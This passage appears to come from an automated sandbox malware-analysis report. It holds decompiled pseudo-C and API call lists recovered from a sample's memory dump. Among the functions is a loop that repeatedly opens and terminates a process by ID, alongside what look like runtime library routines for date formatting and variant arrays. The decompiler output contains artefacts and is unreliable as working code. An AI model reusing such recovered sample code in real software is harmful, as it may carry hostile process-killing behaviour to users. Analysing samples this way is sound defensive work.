    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00418B0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
    C-Code - Quality: 75%
    			E00418B0C() {
				char _v8;
				long _t10;
				void* _t17;
				void* _t18;
				intOrPtr _t20;
				void* _t21;

				_push(0);
				_t21 = 0;
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				while(1) {
					E00403F20( &_v8,  *0x454a5c);
					E00418A14(0x454a5c, _t17, _t18);
					E00404294(_v8,  *0x454a5c);
					if(_t21 != 0) {
						_t21 = E00418560(_t21);
						if(_t21 == 0) {
							_t10 =  *0x454a60; // 0x0
							TerminateProcess(OpenProcess(1, 0, _t10), 0);
						}
					}
					Sleep("h N");
				}
			}









    0x00418b0f
    0x00418b17
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00418b65

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040BAA0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E0040BAA0() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x41912c = _t1;
				}
				if( *0x41912c == 0) {
					 *0x41912c = E004076D4;
					return E004076D4;
				}
				return _t1;
			}





    0x0040baa6
    0x0040baab
    0x0040baaf
    0x0040bab7
    0x0040babc
    0x0040babc
    0x0040bac8
    0x0040bacf
    0x00000000
    0x0040bacf
    0x0040bad5

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00409161, Relevance: 6.4, Strings: 5, Instructions: 128
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t172;
				signed int _t181;
				void* _t183;
				intOrPtr _t224;
				intOrPtr _t227;
				signed int _t232;
				void* _t250;
				void* _t252;
				intOrPtr _t272;
				signed int _t281;
				void* _t282;

				L0:
				while(1) {
					L0:
					E004089D8(_t282);
					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
					if(E004077C0(_t281, 5, 0x409418) != 0) {
						_t166 = E004077C0(_t281, 3, 0x409420);
						__eflags = _t166;
						if(_t166 != 0) {
							_t168 = E004077C0(_t281, 4, 0x409424);
							__eflags = _t168;
							if(_t168 != 0) {
								_t170 = E004077C0(_t281, 4, 0x40942c);
								__eflags = _t170;
								if(_t170 != 0) {
									_t172 = E004077C0(_t281, 3, 0x409434);
									__eflags = _t172;
									if(_t172 != 0) {
										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									} else {
										E004089A0(_t282);
										_pop(_t250);
										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
									}
								} else {
									E004089A0(_t282);
									_pop(_t252);
									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								}
							} else {
								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
								if( *((short*)(_t282 - 0x16)) >= 0xc) {
									_t224 =  *0x454694; // 0x0
									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
								} else {
									_t227 =  *0x454690; // 0x0
									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
								}
								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								 *((char*)(_t282 - 0x1e)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
							if( *((short*)(_t282 - 0x16)) >= 0xc) {
								__eflags = _t281;
							}
							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
							 *((char*)(_t282 - 0x1e)) = 1;
						}
					} else {
						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
						if( *((short*)(__ebp - 0x16)) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E004088C4(2,  *(__ebp + 8));
						 *(__ebp - 4) =  *(__ebp - 4) + 4;
						 *((char*)(__ebp - 0x1e)) = 1;
					}
					while(1) {
						L109:
						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
						if(_t164 == 0) {
							break;
						}
						L1:
						 *(_t282 - 5) = _t164;
						asm("bt [0x419108], eax");
						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t181 =  *(_t282 - 5);
							__eflags = _t181 + 0x9f - 0x1a;
							if(_t181 + 0x9f - 0x1a < 0) {
								_t181 = _t181 - 0x20;
								__eflags = _t181;
							}
							L5:
							__eflags = _t181 + 0xbf - 0x1a;
							if(_t181 + 0xbf - 0x1a >= 0) {
								L10:
								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
								__eflags = _t183 - 0x38;
								if(_t183 > 0x38) {
									L108:
									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E00408974(_t282);
										E004089A0(_t282);
										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
										} else {
											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x24;
										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
										__eax =  *(__ebp - 0x24);
										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E00408974(__ebp) = E004089A0(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E00408974(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E004089A0(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eflags == 0) {
													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x454684; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x454688; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										__eax = E00408974(__ebp);
										__eax = E004089D8(__ebp);
										 *(__ebp - 0x1f) = 0;
										__esi =  *(__ebp - 4);
										while(1) {
											L52:
											__al =  *__esi;
											__eflags =  *__esi;
											if( *__esi == 0) {
												break;
											}
											L34:
											__eax = __eax & 0x000000ff;
											__eflags = __eax;
											asm("bt [0x419108], eax");
											if(__eax >= 0) {
												L36:
												__eax = 0;
												__al =  *__esi;
												__eflags = 0 - 0x48;
												if(0 > 0x48) {
													L42:
													__eax = 0xffffffffffffff9f;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														L45:
														__eflags =  *(__ebp - 0x1f);
														if( *(__ebp - 0x1f) != 0) {
															L51:
															__esi = __esi + 1;
															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x409418;
														__ecx = 5;
														__eax = __esi;
														__eax = E004077C0(__esi, 5, 0x409418);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1e)) = 1;
															break;
														}
														L47:
														__edx = 0x409420;
														__ecx = 3;
														__eax = __esi;
														__eax = E004077C0(__esi, 3, 0x409420);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x409424;
														__ecx = 4;
														__eax = __esi;
														__eax = E004077C0(__esi, 4, 0x409424);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = 0xffffffffffffff98;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(0 == 0x48) {
													break;
												}
												L38:
												__eax = 0xffffffffffffffde;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													L50:
													__al =  *(__ebp - 0x1f);
													__al =  *(__ebp - 0x1f) ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x1f) = __al;
													goto L51;
												}
												L39:
												__eax = 0xffffffffffffffd9;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L50;
												}
												L40:
												__eax = 0xffffffffffffffbf;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__eax = E0040B044(__esi);
												__esi = __eax;
												continue;
											}
										}
										L53:
										__ax =  *((intOrPtr*)(__ebp - 0x16));
										__eflags =  *((char*)(__ebp - 0x1e));
										if( *((char*)(__ebp - 0x1e)) != 0) {
											__eflags = __ax;
											if(__ax != 0) {
												__eflags = __ax - 0xc;
												if(__ax > 0xc) {
													__ax = __ax - 0xc;
													__eflags = __ax;
												}
											} else {
												__ax = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__edx =  *(__ebp + 8);
										__eax = __ax & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E00408974(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x454698; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E00408974(__ebp) =  *(__ebp + 8);
										__eax =  *0x454684; // 0x0
										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										__eax = E004089D8(__ebp);
										__eflags =  *((short*)(__ebp - 0x16));
										if( *((short*)(__ebp - 0x16)) != 0) {
											L93:
											 *(__ebp + 8) = 0x409438;
											__edx = 1;
											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x454681;
										__eflags = __eax - 0x454681;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ecx - 0x75000000) & __bl;
									case 0xe:
										L97:
										__eflags =  *0x45468c;
										__eflags = __eax - 0x45468c;
										_t136 = __edi + __esi * 2 - 0x75;
										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t136;
									case 0xf:
										L100:
										__esi =  *(__ebp - 4);
										while(1) {
											L104:
											__eax =  *(__ebp - 4);
											__al =  *__eax;
											__eflags = __al;
											if(__al == 0) {
												break;
											}
											L105:
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
												L101:
												__eax = __eax & 0x000000ff;
												__eflags = __eax;
												asm("bt [0x419108], eax");
												if(__eax >= 0) {
													_t146 = __ebp - 4;
													 *_t146 =  *(__ebp - 4) + 1;
													__eflags =  *_t146;
												} else {
													__eax =  *(__ebp - 4);
													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *(__ebp - 4);
										__edx =  *(__ebp - 4) - __esi;
										__esi = E004088C4(__edx,  *(__ebp + 8));
										__eax =  *(__ebp - 4);
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *(__ebp - 4) =  *(__ebp - 4) + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t181 - 0x4d;
								if(_t181 == 0x4d) {
									__eflags = _t232 - 0x48;
									if(_t232 == 0x48) {
										_t181 = 0x4e;
									}
								}
								L9:
								_t232 = _t181;
								goto L10;
							}
						} else {
							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t232 = 0x20;
							continue;
						}
					}
					L110:
					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
					_pop(_t272);
					 *[fs:eax] = _t272;
					_push(E00409410);
					return E00403EAC(_t282 - 0x28, 2);
				}
			}

















    0x00409161
    0x00409161
    0x00409161
    0x00409162
    0x0040916b
    0x0040917f
    0x004091b5
    0x004091ba
    0x004091bc
    0x004091f2
    0x004091f7
    0x004091f9
    0x0040923b
    0x00409240
    0x00409242
    0x00409282
    0x00409287
    0x00409289
    0x004092c9
    0x0040928b
    0x0040928c
    0x00409291
    0x004092ae
    0x004092b4
    0x004092b4
    0x00409244
    0x00409245
    0x0040924a
    0x00409267
    0x0040926d
    0x0040926d
    0x004091fb
    0x004091fb
    0x00409200
    0x00409217
    0x0040921c
    0x00409202
    0x00409206
    0x0040920b
    0x00409210
    0x00409222
    0x00409226
    0x00409226
    0x004091be
    0x004091be
    0x004091c3
    0x004091c5
    0x004091c5
    0x004091d3
    0x004091d9
    0x004091dd
    0x004091dd
    0x00409181
    0x00409181
    0x00409186
    0x00409188
    0x00409188
    0x00409188
    0x0040918b
    0x0040918f
    0x00409194
    0x00409196
    0x0040919c
    0x004091a0
    0x004091a0
    0x004093d8
    0x004093d8
    0x004093db
    0x004093df
    0x00000000
    0x00000000
    0x00408cdf
    0x00408cdf
    0x00408cea
    0x00408cf1
    0x00408d24
    0x00408d27
    0x00408d2f
    0x00408d32
    0x00408d34
    0x00408d34
    0x00408d34
    0x00408d36
    0x00408d3b
    0x00408d3e
    0x00408d4d
    0x00408d52
    0x00408d55
    0x00408d58
    0x004093c6
    0x004093d2
    0x00000000
    0x004093d7
    0x00408d5e
    0x00408d64
    0x00000000
    0x00000000
    0x00000000
    0x00408de4
    0x00408de5
    0x00408dec
    0x00408df2
    0x00408df6
    0x00408e28
    0x00408df8
    0x00408e10
    0x00408e15
    0x00000000
    0x00000000
    0x00408e33
    0x00408e3b
    0x00408e41
    0x00408e46
    0x00408e4c
    0x00408e52
    0x00408e55
    0x00000000
    0x00000000
    0x00408e60
    0x00408e68
    0x00408e6e
    0x00408e73
    0x00408e79
    0x00408e7f
    0x00408e82
    0x00000000
    0x00000000
    0x00408e8d
    0x00408e95
    0x00408e9e
    0x00408e9f
    0x00408e9f
    0x00408ea2
    0x00408ea8
    0x00408eac
    0x00408eb0
    0x00408eb3
    0x00408ea4
    0x00408ea4
    0x00408ec2
    0x00408ec6
    0x00408ecd
    0x00408ea6
    0x00408edc
    0x00408ee0
    0x00408ee7
    0x00408eec
    0x00408ea4
    0x00000000
    0x00000000
    0x00408ef2
    0x00408ef9
    0x00408efc
    0x00408efd
    0x00408efd
    0x00408f00
    0x00408f13
    0x00408f17
    0x00408f1b
    0x00408f1e
    0x00408f02
    0x00408f02
    0x00408f3b
    0x00408f3e
    0x00408f45
    0x00408f04
    0x00408f04
    0x00408f04
    0x00408f05
    0x00408f62
    0x00408f65
    0x00408f6c
    0x00408f07
    0x00408f07
    0x00408f07
    0x00408f08
    0x00408f77
    0x00408f7b
    0x00408f80
    0x00408f0a
    0x00408f8b
    0x00408f8f
    0x00408f94
    0x00408f99
    0x00408f08
    0x00408f05
    0x00408f02
    0x00000000
    0x00000000
    0x00408f9f
    0x00408fa0
    0x00408fa7
    0x00408fad
    0x00408fb1
    0x0040904e
    0x0040904e
    0x0040904e
    0x00409050
    0x00409052
    0x00000000
    0x00000000
    0x00408fb9
    0x00408fb9
    0x00408fb9
    0x00408fbe
    0x00408fc5
    0x00408fd2
    0x00408fd2
    0x00408fd4
    0x00408fd6
    0x00408fd9
    0x00408fee
    0x00408fee
    0x00408fee
    0x00408ff1
    0x00408ffa
    0x00408ffa
    0x00408ffe
    0x0040904d
    0x0040904d
    0x0040904d
    0x00000000
    0x0040904d
    0x00409000
    0x00409000
    0x00409005
    0x0040900a
    0x0040900c
    0x00409011
    0x00409013
    0x0040903f
    0x0040903f
    0x00000000
    0x0040903f
    0x00409015
    0x00409015
    0x0040901a
    0x0040901f
    0x00409021
    0x00409026
    0x00409028
    0x00000000
    0x00000000
    0x0040902a
    0x0040902a
    0x0040902f
    0x00409034
    0x00409036
    0x0040903b
    0x0040903d
    0x00000000
    0x00000000
    0x00000000
    0x0040903d
    0x00408ff3
    0x00408ff3
    0x00408ff3
    0x00408ff6
    0x00000000
    0x00000000
    0x00408ff8
    0x00000000
    0x00408ff8
    0x00408fdb
    0x00408fdb
    0x00000000
    0x00000000
    0x00408fdd
    0x00408fdd
    0x00408fdd
    0x00408fe0
    0x00409045
    0x00409045
    0x00409048
    0x00409048
    0x0040904a
    0x00000000
    0x0040904a
    0x00408fe2
    0x00408fe2
    0x00408fe2
    0x00408fe5
    0x00000000
    0x00000000
    0x00408fe7
    0x00408fe7
    0x00408fe7
    0x00408fea
    0x00000000
    0x00000000
    0x00408fec
    0x00000000
    0x00408fc7
    0x00408fc7
    0x00408fc9
    0x00408fce
    0x00000000
    0x00408fce
    0x00408fc5
    0x00409058
    0x00409058
    0x0040905c
    0x00409060
    0x00409062
    0x00409065
    0x0040906d
    0x00409071
    0x00409073
    0x00409073
    0x00409073
    0x00409067
    0x00409067
    0x00409067
    0x00409065
    0x00409077
    0x0040907b
    0x0040907d
    0x0040907d
    0x00409084
    0x00409088
    0x0040908b
    0x0040908e
    0x00000000
    0x00000000
    0x00409099
    0x004090a1
    0x004090a7
    0x004090ab
    0x004090ad
    0x004090ad
    0x004090b4
    0x004090b8
    0x004090bc
    0x004090bf
    0x00000000
    0x00000000
    0x004090ca
    0x004090d2
    0x004090d8
    0x004090dc
    0x004090de
    0x004090de
    0x004090e5
    0x004090e9
    0x004090ed
    0x004090f0
    0x00000000
    0x00000000
    0x004090fb
    0x004090fc
    0x00409102
    0x00409106
    0x0040911c
    0x00409120
    0x00409125
    0x00409108
    0x00409108
    0x0040910c
    0x00409111
    0x00409116
    0x00000000
    0x00000000
    0x00409130
    0x00409138
    0x0040913e
    0x00409142
    0x00409144
    0x00409144
    0x0040914b
    0x0040914f
    0x00409153
    0x00409156
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004092d4
    0x004092db
    0x004092df
    0x004092e4
    0x004092eb
    0x004092f1
    0x004092f6
    0x0040930a
    0x0040930e
    0x00409313
    0x0040931e
    0x00409322
    0x00409327
    0x00000000
    0x0040932c
    0x004092f8
    0x004092f8
    0x004092fd
    0x00000000
    0x00000000
    0x004092ff
    0x004092ff
    0x00409304
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409332
    0x00409332
    0x00409333
    0x00409338
    0x0040933a
    0x00000000
    0x00409358
    0x00409358
    0x00409359
    0x0040935e
    0x0040935e
    0x0040935e
    0x00000000
    0x00409377
    0x00409377
    0x0040939a
    0x0040939a
    0x0040939a
    0x0040939d
    0x0040939f
    0x004093a1
    0x00000000
    0x00000000
    0x004093a3
    0x004093a3
    0x004093a6
    0x0040937c
    0x0040937c
    0x0040937c
    0x00409381
    0x00409388
    0x00409397
    0x00409397
    0x00409397
    0x0040938a
    0x0040938a
    0x00409392
    0x00409392
    0x00000000
    0x00409388
    0x00000000
    0x004093a6
    0x004093a8
    0x004093a8
    0x004093ac
    0x004093af
    0x004093b3
    0x004093b9
    0x004093bc
    0x004093bf
    0x004093c1
    0x004093c1
    0x00000000
    0x00000000
    0x00408d40
    0x00408d40
    0x00408d42
    0x00408d44
    0x00408d47
    0x00408d49
    0x00408d49
    0x00408d47
    0x00408d4b
    0x00408d4b
    0x00000000
    0x00408d4b
    0x00408cf3
    0x00408d04
    0x00408d12
    0x00408d15
    0x00000000
    0x00408d15
    0x00408cf1
    0x004093e5
    0x004093e8
    0x004093f0
    0x004093f3
    0x004093f6
    0x00409408
    0x00409408

    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040D920, Relevance: 6.1, APIs: 4, Instructions: 115
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040C9FC();
							E0040D7EC(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040CA04();
							E0040D7EC(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040D8C4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040D894(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040CA0C();
						E0040D7EC(_v780);
						E0040DB18(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040C598();
				return E0040D7EC(_v776);
			}






















